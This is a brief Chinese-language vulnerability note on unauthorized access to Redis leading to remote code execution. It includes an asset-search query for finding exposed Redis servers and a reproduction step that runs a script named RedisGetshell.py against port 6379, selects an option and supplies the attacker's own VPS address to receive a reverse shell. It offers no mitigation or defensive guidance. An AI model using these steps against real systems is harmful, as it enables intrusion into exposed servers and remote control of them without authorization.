Redis存在未授权访问导致的RCE
一、漏洞描述
redis是一个非常快速的,开源的,支持网络,可以基于内存,也可以持久化的日志型,非关系型的键值对数据库。并提供了多种语言的api。有java,c/c++,c#,php,JavaScript,perl,object-c,python,ruby,erlang等客户端,使用方便。Redis存在未授权访问导致的RCE
二、影响版本
Redis
三、资产测绘
app="redis"
三、漏洞复现
反弹shell使用脚本
python RedisGetshell.py -H 127.0.0.1 -P 6379
选3,之后输入自己vps地址,即可反弹shell